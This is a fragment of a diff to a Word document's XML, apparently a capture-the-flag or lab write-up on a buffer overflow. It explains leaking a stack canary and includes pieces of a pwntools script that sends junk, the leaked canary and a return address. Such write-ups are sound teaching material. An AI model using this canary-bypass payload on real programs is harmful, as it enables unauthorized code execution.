-                      <a:ext cx="4305521" cy="1168460"/>
+                      <a:ext cx="5680481" cy="1541605"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -4449,15 +4484,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> resides. Therefore, in order to leak the canary, I capture the output that is sent </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">right after </w:t>
+        <w:t xml:space="preserve"> resides. Therefore, in order to leak the canary, I capture the output that is sent right after </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4493,7 +4520,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>. I then send 24 bytes of junk, the canary value</w:t>
+        <w:t>. Since the program crashes if I send 24 bytes of junk, I send a payload consisting of that, as well as the canary value in integer representation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4557,6 +4584,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">If I return to the top of </w:t>
       </w:r>
       <w:r>
@@ -4610,15 +4638,14 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
-          <w:noProof/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79327286" wp14:editId="1F608148">
-            <wp:extent cx="5972810" cy="1522730"/>
-            <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
-            <wp:docPr id="1429024128" name="Picture 2" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A9FBF8A" wp14:editId="1D83F47D">
+            <wp:extent cx="5611849" cy="1371600"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:docPr id="1448921902" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4626,36 +4653,23 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1429024128" name="Picture 2" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
+                    <pic:cNvPr id="1448921902" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5972810" cy="1522730"/>
+                      <a:ext cx="5621399" cy="1373934"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -4768,7 +4782,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">stack alignment becomes off by 8), and thus the </w:t>
+        <w:t xml:space="preserve">stack alignment becomes off by 8, and thus the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4844,9 +4858,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="544C71B6" wp14:editId="13B322B2">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4733B4" wp14:editId="4897677E">
             <wp:extent cx="5343525" cy="1781175"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="227121358" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated"/>
@@ -5165,36 +5178,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
         <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
         <w:rPr>
@@ -5362,6 +5345,75 @@
     <w:p>
       <w:pPr>
         <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> os </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> linesep </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t># formatting</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
         <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5552,46 +5604,13 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io.sendline(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'24'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t># because if I input junk of size 24, I get seg. fault</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5607,6 +5626,17 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t># i.e. the 'carrying capacity' is 24</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5630,29 +5660,40 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">r </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> io.recvline()</w:t>
+        <w:t>io.sendline(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'24'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5671,35 +5712,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">prompt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5721,7 +5751,18 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>"Here's a hint: "</w:t>
+        <w:t>'24'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5737,83 +5778,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">canary </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> r[r.startswith(prompt) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>len</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(prompt):]</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5828,6 +5792,39 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">r </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> io.recvline()</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5851,7 +5848,51 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>io.recvline()</w:t>
+        <w:t xml:space="preserve">prompt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"Here's a hint: "</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5876,29 +5917,7 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>io.send(cyclic(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>24</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
+        <w:t xml:space="preserve">canary </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5909,128 +5928,18 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> p64(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(canary, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>16</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cyclic(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> p64(</w:t>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> r[r.startswith(prompt) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6041,30 +5950,55 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>0x</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
